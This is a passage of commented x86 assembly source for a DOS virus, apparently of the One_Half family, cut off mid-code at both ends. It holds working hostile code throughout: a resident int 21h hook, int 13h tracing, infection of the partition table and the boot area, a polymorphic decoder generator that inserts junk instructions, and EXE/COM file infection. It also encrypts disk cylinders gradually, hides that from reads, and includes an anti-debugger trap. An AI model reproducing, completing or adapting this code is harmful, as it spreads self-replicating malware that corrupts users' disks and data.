db 0bbh
new_int_01h_mov_bx_? dw 5200h ; mov bx, ?
mov cs:[int_13h_addr - p][bx], ax
mov cs:[int_13h_addr - p + 2][bx], ds
mov byte ptr cs:[jump_patch_? - p][bx], offset loc_084f - (offset jump_patch_? + 1)
pop ds
pop bx
pop ax
loc_084F:
and byte ptr [bp+7], 0FEh
loc_0853:
pop bp
iret

; Diz installz viruz 2 mem


loc_0855:
pop bx ; pop index
pop ax ; pop es_seg
push ax
dec ax ; go2 mcb_block
mov ds, ax ; store it 2 ds
cmp byte ptr ds:[0], 5Ah ; last one ?
jne short loc_08CE
add ax, ds:[3] ; add blockz_size
sub ax, 0FFh ; sub 4 viruz_body
mov dx, cs ; (4 our bufferz etc.)
mov si, bx ; index 2 so
mov cl, 4
shr si, cl ; make paragraphz
add dx, si ; add it 2 cs
db 2eh, 8bh, 0b7h, 1ah, 00h; mov si, cs:[1ah][bx]
; gimme min_mem (from exe_header)
cmp si, 106h
jae short loc_0881
mov si, 106h
loc_0881:
add dx, si ; add min_mem
cmp ax, dx ; less ?
jb short loc_08CE
mov byte ptr ds:[0], 4Dh ; make middle_block
sub word ptr ds:[3], 100h ; sub 100h paragraphz
; (0ffh viruz and 01h _mcb_)
mov ds:[12h], ax ; set new mem_top 2 PSP
mov es, ax ; gimme where_2_move_seg
push cs
pop ds
inc ax
mov ds:[1], ax ; store owner
mov byte ptr [which_jump_? - p][bx], 0EBh
mov si, bx ; gimme index
xor di, di ; move 2 0000h
mov cx, offset buffer - p ; gimme viruz_size
rep movsb ; and finally move
push es
pop ds
call sub_078B ; move presun_rutiny
xor ax, ax
mov ds, ax
cli
mov ax, ds:[21h * 4] ; gimme old_int_21h
mov es:[old_int_21h - p__], ax ; store it
mov ax, word ptr ds:[21h * 4 + 2]
mov es:[old_int_21h - p__ + 2], ax
mov word ptr ds:[21h * 4], offset new_int_21h - p
mov word ptr ds:[21h * 4 + 2], es ; and set my own
sti ; int_21h
loc_08CE:
jmp loc_0A1E ; and go on

; Diz iz the beginning ...


loc_08D1:
call sub_08D4
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_08D4 proc near
pop si
sub si, offset sub_08d4 - p ; count where we are
mov [new_int_01h_mov_bx_? - p][si], si
push es
push si ; si = 582h
cld
inc word ptr [run_counter - p][si]
mov byte ptr [which_jump_? - p][si], 74h
xor ax, ax
mov es, ax
mov ax, es:[46Ch] ; gimme tick_counter
mov [mov_bx_? - p][si], ax ; store it
mov [crypt_value - p][si], ax; 2 timez
mov ax, 4B53h ; am i in mem ?
int 21h
cmp ax, 454Bh ; check mark
je short loc_0965
mov ah, 52h ; nope so go on
int 21h ; gimme list_of_listz_ptr
mov ax, es:[bx-2] ; gimme 1. MCB_segment
mov [which_segment_? - p][si], ax ; store it
mov byte ptr [jump_patch_? - p][si], 0
mov ax, 3501h ; get int_01h
int 21h
push bx ; store it to stack
push es
mov ax, 3513h ; get int_13h
int 21h
mov [int_13h_addr - p][si], bx ; store it to
mov [int_13h_addr - p + 2][si], es; variablez
mov ax, 2501h ; set my int_01h
lea dx, [new_int_01h - p][si]
int 21h
lea bx, [buffer - p][si]
mov cx, 1 ; read partition_table
mov dx, 80h
push cs
pop es
pushf
pop ax
or ah, 1 ; set trap_flag
push ax
popf
mov ax, 201h ; and trace int_13h
call int_13h
pushf
pop ax
and ah, 0FEh ; null trap_flag
push ax
popf
pop ds
pop dx
pushf
mov ax, 2501h ; restore int_01h
int 21h
popf
jc short loc_09C0 ; any errorz ?
push cs
pop ds
cmp word ptr [bx+25h], offset the_second_part - p
jne short loc_0968 ; iz in partition my viruz ?
; (mark)
loc_0965:
jmp loc_0A1D
loc_0968:
cmp word ptr [bx + 180h], 72Eh; next mark
je short loc_09C0
mov ah, 8 ; gimme hard_paramz
mov dl, 80h ; prvniho_hadru
call int_13h
jc short loc_09C0 ; error ?
and cx, 3Fh ; voklesti max_sector
mov [max_sektor - p][si], cl
mov [max_sektor_2 - p][si], cl
and dh, 3Fh ; voklesti headz
mov [max_heads - p][si], dh
mov ax, 301h
sub cl, 7
mov [partition_sec_n - p][si], cl
mov dx, 80h
call int_13h ; write partition_table
jc short loc_09C0 ; error ?
push cx
push dx
push si
xchg di, si
mov cx, 4 ; 4 entryz
add bx, 1EEh ; go2 last_parition_entry
locloop_09A9:
mov al, [bx+4] ; read FAT type
cmp al, 1 ; DOS 12bit ?
je short loc_09C3
cmp al, 4 ; 4 = DOS 16bit ?
jb short loc_09B8 ; 5 = EXTENDED_DOS_PARTITION ?
cmp al, 6 ; 6 = BIGDOS (nad 32Mbyte) ?
jbe short loc_09C3
loc_09B8:
sub bx, 10h ; every record has 10h bytez
loop locloop_09A9

pop si
pop dx
pop cx
loc_09C0:
jmp loc_0855 ; jmp 2 mem_install
loc_09C3:
mov cx, [bx+2] ; gimme boot_start
mov dh, [bx+1] ; gimme head
call sub_0D2F ; convert_it
add si, 7 ; make valid cyl_number
mov [lowest_cyl - p][di], si ; store it
xchg si, ax
mov cx, [bx+6] ; gimme end cylinder
mov dh, [bx+1] ; gimme head
call sub_0D2F ; convert_it
mov [max_cyl_number - p][di], si; store it
mov [mov_ax_? - p][di], si ; store it
add ax, si
shr ax, 1 ; div with 2
mov [one_half_cyl - p][di], ax; store one_half
pop si
pop dx
pop cx
mov ax, 307h
xchg bx, si
inc cx
mov [viruz_start_sec - p][bx], cx
call int_13h ; write viruz_ body
jc loc_09C0 ; (whole)
lea si, [boot_start - p][bx]; and now move boot
lea di, [buffer - p][bx]
push di
mov cx, offset the_second_part - offset boot_start
rep movsb
db 0b8h ; mov ax, ?
mov_ax_? dw 265h ; store starting_sector_
stosw ; _2_ crypt
mov ax, 301h ; write the new parition_table
pop bx
mov cx, 1
call int_13h
jc loc_09C0 ; error ?
loc_0A1D:
pop bx ; nope
loc_0A1E:
push cs ; dis is a renewal of parts
pop ds ; that were overwritten
push cs ; by decode routine
pop es
db 8Dh,0B7h ; lea si, cs:[overwritt...][bx]
dw offset overwritten_bytez - p
db 81h,0C3h ;add bx, offset decode_...
dw offset decode_routine_table - p
mov cx, 0Ah ; there'z 0ah_partz

locloop_0A2D:
mov di, [bx] ; gimme where_2_move_offset
push cx
mov cx, 0Ah ; every_part haz 0ah bytez
rep movsb
pop cx
inc bx ; go2 next_move_offset
inc bx
loop locloop_0A2D ; and go on

pop es
db 83h,0C3h ; add bx, 0 - (....)
db 0 - (offset beginning_ofs - offset exe_header)
mov di, es ; bx 2 exe_header_offset
add di, 10h ; count start_seg
add [bx+16h], di ; store relo_cs
add [bx+0Eh], di ; store relo_ss
cmp word ptr [bx+6], 0 ; what'bout relo_cnt ?
je short loc_0AB6 ; there'z any ?
mov ds, es:[2ch] ; yope; gimme environment_seg
xor si, si ; start at offset 00h
loc_0A56:
inc si
cmp word ptr [si], 0 ; eof formal_environment ?
jne loc_0A56
add si, 4 ; go2 prog_name
xchg dx, si
mov ax, 3D00h ; open prog_file
int 21h
jc short loc_0ADB ; error ?
push cs
pop ds
mov ds:[handle_ - p - 10h][bx], ax ; store handle_
mov dx, [bx+18h] ; gimme tabl_offset
mov ax, 4200h ; f_ptr 2 it
call sub_0817
push es ; store start_seg
xchg di, ax
loc_0A79:
push ax
lea dx, cs:[reloc_buffer - p - 10h][bx]
mov cx, [bx+6] ; gimme relo_cnt
cmp cx, (name_buffer + 34 - random_number) shr 2
jb short loc_0A8A ; 2 big ?
mov cx, (name_buffer + 34 - random_number) shr 2
; yope gimme max_relo_cnt_now
loc_0A8A:
sub [bx+6], cx ; sub it from relo_cnt
push cx
shl cx, 1 ; mul it with 4
shl cx, 1 ; (segment:offset)
mov ah, 3Fh ; read reloc_table
call sub_0817
jc short loc_0ADB ; error ?
pop cx
pop ax
xchg si, dx

locloop_0A9D:
add [si+2], ax ; make relo_seg
les di, dword ptr [si] ; gimme relo_addr
add es:[di], ax ; and add start_seg
add si, 4 ; go2 next entry
loop locloop_0A9D

cmp word ptr [bx+6], 0 ; relo_cnt is null ?


ja loc_0A79 ; if yope go on
pop es ; nope
mov ah, 3Eh ; so close_file
call sub_0817
loc_0AB6: ; nope
push es
pop ds
cmp byte ptr cs:[bx+12h], 0 ; com_file ?
jne short loc_0ACC
mov si, bx ; gimme exe_header_offset
mov di, 100h
mov cx, 3 ; move 3 bytez 2 100h
rep movsb
pop ax
jmp short loc_0AD7 ; and go on
loc_0ACC: ; nope it'z exe_file
pop ax
cli
mov sp, cs:[bx+10h] ; gimme sp
mov ss, cs:[bx+0Eh] ; gimme ss
sti
loc_0AD7:
jmp dword ptr cs:[bx+14h] ; finally jmp 2 real_prog_start
loc_0ADB:
mov ah, 4Ch ; there waz an error !
int 21h
;
reloc_buffer label near
;

; in : dx = max_number
; out : dx = random_number
random_number:
mov cs:[mov_si_? - p], si
push ax
push bx
push cx
push dx
db 0b9h ; mov cx, ?
mov_cx_? dw 0b0d4h
db 0bbh ; mov bx, ?
mov_bx_? dw 6210h
mov dx, 15Ah
mov ax, 4E35h
xchg si, ax
xchg dx, ax
test ax, ax
jz short loc_0AFC
mul bx
loc_0AFC:
jcxz short loc_0B03
xchg cx, ax
mul si
add ax, cx
loc_0B03:
xchg si, ax
mul bx
add dx, si
inc ax
adc dx, 0
mov cs:[mov_bx_? - p], ax
mov cs:[mov_cx_? - p], dx
mov ax, dx
pop cx
xor dx, dx
jcxz short loc_0B1E
div cx
loc_0B1E:
pop cx
pop bx
pop ax
pop si
push si
cmp byte ptr cs:[si], 0CCh ; there'z a breakpoint ?
loc_0B27:
je loc_0B27 ; if yope stay in loop
; (nice_try ...)
db 0beh ; mov si, ?
mov_si_? dw 5cbh
retn
sub_08D4 endp

; decode_routine haz 10 piecez ... (10 instructionz)


;
instr_start:
db 01h ; instruction_length
db 50h ; push ?_reg
;
db 01h ; instruction_length
push_what db 0eh ; push cs or push ss
;
db 01h ; instruction_length
db 1fh ; pop ds
;
db 03h ; instruction_length
mov_index_? db 0bfh ; mov ?_index_reg, im16
viruz_start dw 0582h ; im16
;
db 03h ; instruction_length
mov_?_instr db 0b8h ; mov ?_reg, im16
crypt_viruz_value dw 0bfbah ; im16
;
db 02h ; instruction_length
db 31h ; xor [index_reg], ?_reg
xor_?_instr db 05h ; ModR/M
;
db 04h ; instruction_length
db 81h ; add ?_reg, im16
add_?_instr db 0c0h ; ModR/M, opcode
next_crypt_value_ dw 6efeh ; im16
;
db 01h ; instruction_length
inc_?_instr db 47h ; inc ?_reg
;
db 04h ; instruction_length
db 81h ; cmp ?_index_reg, im16
cmp_index_? db 0ffh ; ModR/M, opcode
viruz_end dw 135ah ; im16
;
db 02h ; instruction_length
db 75h ; jnz disp8
db 0efh
;

;
unimportant_instr:
;
nop
stc
clc
sti
db 2Eh ; cs:
db 36h ; ss:
db 3Eh ; ds:
cld
std
cmc
;

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz movez unimportant_instr 2 buffer
; in : dx = wieviel :-)
sub_0B57 proc near
or dx, dx ; count is null ?
jz short loc_ret_0B71
push si
push cx ; push regz
push dx
mov cx, dx ; count 2 cx
locloop_0B60:
mov si, offset unimportant_instr - p
mov dx, 0Ah ; max_random 2 0ah (10 instr)
call random_number ; gimme random_number
add si, dx ; go2 instruction
movsb ; move it
loop locloop_0B60 ; and go on

pop dx
pop cx ; restore regz
pop si

loc_ret_0B71:
retn ; and end ...
sub_0B57 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz putz be4 and after instruction unimportant_instructionz
; in : dx = wieviel u_instr
sub_0B72 proc near
mov ax, dx ; instr_count 2 ax
inc dx
call random_number ; gimme random_number
sub ax, dx ; sub cur_instr_count from
; instr_count
call sub_0B57 ; move unimportant_instr
xchg dx, ax
rep movsb ; move real_instruction
db 81h,0FBh ; cmp bx, offset jnz_offset - p
dw offset jnz_offset - p ; it'z last_one ? (jnz xor_...)
jnz short loc_0B92
mov ax, ds:[xor_offset - p] ; gimme xor_offset
sub ax, di ; sub cur_instr_buffer_index
add ax, offset instr_buffer - p; add instr_buffer_back
sub ax, [bx] ; sub jnz_offset
dec di ; go2 disp8
stosb ; and store it
loc_0B92:
call sub_0B57 ; and now put some u_instr
; after real_instruction
retn ; and end ...
sub_0B72 endp

m_?_i dw offset mov_?_instr - p ; 0b38h ; 0b96h ; 0614h


x_?_i dw offset xor_?_instr - p ; 0b3dh ; 0b98h ; 0616h
a_?_i dw offset add_?_instr - p ; 0b40h ; 0b9ah ; 0618h
m_i_? dw offset mov_index_? - p ; 0b34h ; 0b9ch ; 061ah
x_?_i_ dw offset xor_?_instr - p ; 0b3dh ; 0b9eh ; 061ch
i_?_i dw offset inc_?_instr - p ; 0b44h ; 0ba0h ; 061eh
c_i_? dw offset cmp_index_? - p ; 0b47h ; 0ba2h ; 0620h

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; This sets rite ModR/M instructions ....
; There are two phases here:
; 1. : m_?_i - a_?_i = sets instruction that worx with xor_reg
; 2. : m_i_? - c_i_? = sets instruction that worx with index_reg
; in : dl = random_number that depends on phase
; Just go through it and try to know what's happening here :)
sub_0BA4 proc near
loc_0BA4:
lodsw
xchg di, ax
mov al, dl
cmp si, offset i_?_i - p
jne short loc_0BB6
and al, 5
cmp al, 1
jne short loc_0BC6
mov al, 7
loc_0BB6:
cmp si, offset a_?_i - p
jne short loc_0BC6
mov cl, 3
shl al, cl
or [di], al
or al, 0C7h
jmp short loc_0BCA
loc_0BC6:
or [di], al
or al, 0F8h
loc_0BCA:
and [di], al
cmp si, offset m_i_? - p
je short loc_ret_0BDA
cmp si, offset sub_0BA4 - p
je short loc_ret_0BDA
jmp short loc_0BA4

loc_ret_0BDA:
retn
sub_0BA4 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz preparez decode_routine ...
sub_0BDB proc near
mov dx, 2
call random_number ; gimme random_number
mov byte ptr ds:[push_what - p], 0Eh; store push_cs
or dx, dx ; random_number nullovy ?
jz short loc_0BEF
mov byte ptr ds:[push_what - p], 16h; nope so store
; push_ss
loc_0BEF:
mov si, offset m_?_i - p ; start with first_phaze
loc_0BF2:
mov dx, 8
call random_number ; gimme random_number
cmp dl, 4 ; we don't need sp_reg
je loc_0BF2
mov bl, dl ; reg 2 bl
call sub_0BA4 ; set instructionz etc.
mov si, offset m_i_? - p ; start with second_phaze
loc_0C05:
mov dx, 3
call random_number ; gimme random_number
add dl, 6
cmp dl, 8
jne short loc_0C15
mov dl, 3 ; yope set bx_reg
loc_0C15:
cmp dl, bl ; xor_reg = index_reg ?
je loc_0C05
call sub_0BA4 ; nope so set instr. etc.
xor cx, cx
mov di, offset decode_routine_table - p
loc_0C21:
cmp cx, 9 ; jnz_instruction ?
jne short loc_0C40
loc_0C26: ; yope
; it'z jnz disp8
; so it must be in the range
; 0 - 80h bytez
mov dx, 0C8h
call random_number ; gimme random_number
sub dx, 64h ; sub 0c8h / 2
add dx, ds:[xor_offset - p] ; add xor_offset
cmp dx, 0 ; less than 0 ?
jl loc_0C26
cmp dx, ds:[max_number - p] ; more or same than max_number?
jge loc_0C26
jmp short loc_0C46
loc_0C40:
db 0bah ; mov dx, ?
max_number dw 466h ; random_max iz max_number
call random_number ; gimme random_number
loc_0C46:
jcxz short loc_0C5F ; first timez here ?
mov si, offset decode_routine_table - p
push cx ; nope
locloop_0C4C: ; so go2 cur_instr and check
; 4 distancez
lodsw
sub ax, dx ; check 4 distance
cmp ax, 0Ah ; more or same than 0ah bytez ?
jge loc_0C5C
cmp ax, 0FFF6h ; less or same than 0ah bytez ?
jle loc_0C5C
pop cx ; nope ! get another random_#
jmp loc_0C21
loc_0C5C: ; yope
loop locloop_0C4C ; so go2 next insrt
pop cx ; last_one
loc_0C5F:
xchg dx, ax ; random_number 2 ax
stosw ; store it 2 decode_...
inc cx ; inc counter
cmp cx, 0Ah ; less than 0ah (10 piecez) ?
jb loc_0C21
; nope = decode_routine_table
; initialized ...
mov bx, offset decode_routine_table - p
mov si, offset instr_start - p
loc_0C6D:
mov di, offset instr_buffer - p
lodsb ; read instr_length
mov cl, al ; instr_length 2 cx
mov dx, 8 ; u_instr 2 dx
sub dx, cx ; sub it
mov ax, [bx+2] ; gimme next_d_entry_offset
; if jnz_instr next iz
; viruz_beginning ...
sub ax, [bx] ; sub from it cur_d_entry
cmp ax, 0Ah ; distance 0ah ?
jne short loc_0C8B
inc dx ; inc u_instr (we don't need
inc dx ; jmp_instr ...)
call sub_0B72
inc bx ; go2 next decode_routine_
inc bx ; _offset
jmp short loc_0CB5 ; and go on
loc_0C8B: ; nope
call random_number ; gimme random_number
call sub_0B72 ; copy instruction 2 buffer ...
mov dx, di ; gimme instr_buffer_offset
sub dx, offset three_bytez - p; sub ofs instr_buffer - 3
add dx, [bx] ; add cur_d_entry
mov al, 0E9h ; far_jmp 2 al
stosb ; store it
inc bx ; go2 next_entry
inc bx
mov ax, [bx] ; gimme it
sub ax, dx ; sub it
cmp ax, 7Eh ; distance more than 7eh ?
jg short loc_0CB4
cmp ax, 0FF7Fh ; distance less than 0ff7fh ?
jl short loc_0CB4
inc ax ; nope inc distance (jmp_short
; only 2 bytez ...)
mov byte ptr [di-1], 0EBh ; store rather jmp_short
stosb ; store disp8
jmp short loc_0CB5 ; and go on
loc_0CB4: ; yope
stosw ; store disp16
loc_0CB5:
push bx
push cx
db 0b9h ; mov cx, 0
mov_cx_?_ dw 0 ; gimme file_pointer
db 0bah ; mov dx, 13h
mov_dx_?_ dw 13h
add dx, [bx-2] ; add decode_table_entry
adc cx, 0 ; (the current)
push cx
push dx
call sub_0E63 ; go2 f_ptr
mov cx, 0Ah ; read 0ah bytez
db 0bah ; mov dx, ?
buffer_offset dw 0a4h ; 2 [buffer_offset]
add ds:[buffer_offset - p], cx; go2 next_buffer_offset_entry
call f_read_
pop dx
pop cx
jc short loc_0CE6 ; error ?
call sub_0E63 ; go back 2 f_ptr
xchg cx, di ; cur_instr_buffer_offset 2 cx
mov dx, offset instr_buffer - p; sub offset instr_buffer
sub cx, dx ; sub it 2 get instr_size
call f_write_ ; and write it ...
loc_0CE6:
pop cx
pop bx
jc short loc_ret_0CF3 ; error ?
db 81h,0FBh ; cmp bx, offset beginning_ofs - p
dw offset beginning_ofs - p
jnc short loc_ret_0CF3 ; last decode_routine_entry ?
jmp loc_0C6D ; nope so go on ...

loc_ret_0CF3: ; yope
retn ; so end ...
sub_0BDB endp

; Purpose of moving to buffer:


; while writing viruz_body to file, the virus crypts viruz_body so
; int_13h and crypt_routine and routine that writes it to file
; far far away from range of crypt_routine
presun_rutiny:
mov cx, offset buffer - p ; gimme size 2 write
xor dx, dx ; start with offset null
call sub_0D12 ; crypt_ it
mov ah, 40h ; write crypted_ viruz_body
mov bx, ds:[handle - p] ; 2 file; gimme handle
pushf ; and
db 9Ah ; call far ptr old_int_21h
old_int_21h dw 0, 0
jc short loc_0D0C ; error ?
cmp ax, cx ; written_&_wanted the same ?
loc_0D0C:
pushf ; push flagz
call sub_0D12 ; decrypt_ viruz_body
popf ; restore flagz
retn ; and end ...

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz cryptz_ viruz_body
sub_0D12 proc near
push cx
mov si, dx ; gimme viruz_start_offset
db 0b8h ; mov ax, 0
crypt_viruz dw 0 ; gimme init_crypt_vale
mov cx, offset buffer - p ; gimme viruz_size

locloop_0D1B:
xor [si], ax ; crypt_it
db 05h ; add ax, ?
next_crypt_value dw 0 ; go2 next_crypt_value
inc si ; go2 next viruz_byte
loop locloop_0D1B ; and go on

pop cx
retn ; and end ...
sub_0D12 endp

new_int_24h:
mov al, 3
iret

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz callz old_int_13h
sub_0D28 proc near
pushf
call dword ptr cs:[old_int_13h - p__]
retn
sub_0D28 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz getz cylinder_number in si
sub_0D2F proc near
push cx
push dx
shr cl, 1
shr cl, 1
and dh, 0C0h
or dh, cl
mov cl, 4
shr dh, cl
mov dl, ch
xchg si, dx
pop dx
pop cx
retn
sub_0D2F endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz cryptz_ a buffer
crypt_ proc near
push ax
push bx ; push regz
push cx
db 0b0h ; mov al, ?
secz_count db 0 ; gimme secz_count
db 0bbh ; mov bx, ?
buf_ptr dw 0 ; gimme buf_ptr
loc_0D4D:
mov cx, 100h ; do it 256*
; (in wordz)
locloop_0D50:
db 26h, 81h, 37h ; xor word ptr es:[bx], ?
crypt_value dw 2b50h ; xor word ...
inc bx ; go2 next_word in buffer
inc bx
loop locloop_0D50 ; and go on

dec al ; dec secz_count


jnz loc_0D4D ; last one ?
pop cx ; yope
pop bx ; restore regz
pop ax
retn ; and end ...
crypt_ endp

new_int_13h:
cmp ah, 2 ; read sector(z) ?
je short loc_0D6E
cmp ah, 3 ; write sector(z) ?
je short loc_0D6E
jmp loc_0E50 ; nope so end
loc_0D6E:
cmp dx, 80h ; 0.head, first_harddisk ?
jne short loc_0DE0
test cx, 0FFC0h ; cylinder is null ?
jnz short loc_0DE0
push bx ; ok it could be work with
push dx ; partition_table or with
push si ; viruz_body
push di
push cx
push cx
mov si, ax ; gimme ax_reg
and si, 0FFh ; gimme secz_2_work
mov di, si
mov al, 1
push ax
jz short loc_0DBB ; secz_2_work is null ?
jcxz short loc_0DDB ; sec_number is null ?
cmp cl, 1 ; work with parition_table ?
je short loc_0DCD
loc_0D94: ; nope so it could be viruz
db 80h, 0f9h ; body
max_sektor db 11h ; cmp cl, ?
ja short loc_0DDB ; are we in the range
db 80h, 0f9h ; cmp cl, ?
partition_sec_n db 0ah ; where'z viruz_body ?
jb short loc_0DD2
cmp ah, 3 ; yope = writing ?
je short loc_0DDB ; (end_with error)
push bx
mov cx, 200h ; do it 512*

locloop_0DA7:
mov byte ptr es:[bx], 0 ; store null
inc bx ; inc buffer_ptr
loop locloop_0DA7 ; and go on ...

pop bx
loc_0DAF:
add bx, 200h ; go2 next_sec_in_buffer
pop ax
pop cx
inc cx ; inc sec_number
push cx
push ax
dec si ; dec secz_2_work
jnz loc_0D94 ; null ?
loc_0DBB:
clc
loc_0DBC: ; yope
pop ax ; restore ax_reg
pushf
xchg di, ax ; secz_2_work 2 ax
sub ax, si ; sub secz_that_weren't_read
popf
mov ah, ch ; error number 2 ah
pop cx
pop cx
pop di ; restore regz
pop si
pop dx
pop bx
retf 2 ; and end ...
loc_0DCD:
mov cl, byte ptr cs:[partition_sec_n - p__] ; yope
; so gimme parition_table_sec
loc_0DD2:
call sub_0D28 ; write or read it
mov ch, ah ; gimme possible_error_number
jc loc_0DBC ; error ?
jmp short loc_0DAF ; nope = go on
loc_0DDB: ; yope
stc ; so set up error_flag
mov ch, 0BBh ; and error_number 2 ch
jmp short loc_0DBC ; (undefined_error)
loc_0DE0: ; nope
cmp dl, 80h ; it'z first_harddisk ?
jne short loc_0E50
push ax
push cx
push dx
push si ; push regz
push ds
push cs
pop ds
mov byte ptr ds:[secz_count - p__], 0 ; store null
mov word ptr ds:[buf_ptr - p__], bx ; store bx
call sub_0D2F ; gimme cylinder_number
and cl, 3Fh ; voklesti sector
and dh, 3Fh ; voklesti head
loc_0DFE:
or al, al ; secz_2_work is null ?
jz short loc_0E31
db 81h, 0feh ; cmp si, ?
max_cyl_number dw 265h ; are we in the range
jae short loc_0E31 ; where'z harddisk
db 81h, 0feh ; cmp si, ?
cur_cyl_number dw 1234h ; crypted_ ?
jb short loc_0E14
inc byte ptr ds:[secz_count - p__] ; yope inc secz_count
jmp short loc_0E1A
loc_0E14:
add word ptr ds:[buf_ptr - p__], 200h; go2 next_sec_in_buf
loc_0E1A:
dec al ; dec secz_2_work
inc cl
db 80h, 0f9h ; cmp cl, ?
max_sektor_2 db 11h ; sector in range ?
jbe loc_0DFE
mov cl, 1 ; nope so sector 2 1
inc dh ; and inc head
db 80h, 0feh ; cmp dh, ?
max_heads db 07h ; head in range ?
jbe loc_0DFE
xor dh, dh ; nope so head 2 null
inc si ; and inc cylinder
jmp short loc_0DFE ; and go on
loc_0E31: ; yope
cmp byte ptr ds:[secz_count - p__], 0; must we (un)crypt_
pop ds ; something ?
pop si ; restore regz
pop dx
pop cx
pop ax
jz short loc_0E50
cmp ah, 2 ; yope; read ?
je short loc_0E45
call crypt_ ; nope write; crypt_ it
loc_0E45:
call sub_0D28 ; do it
pushf
call crypt_ ; and uncrypt_ it
popf
retf 2
loc_0E50: ; end ...
db 0EAh ; jmp far ptr old_int_13h
old_int_13h label near

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz writez 2 file ...
f_write_ proc near
mov ah, 40h
jmp $ + 4
f_write_ endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz readz from file ...
f_read_ proc near
mov ah, 3Fh ; '?'
call sub_0E6F
jc short loc_ret_0E5E
cmp ax, cx

loc_ret_0E5E:
retn
f_read_ endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
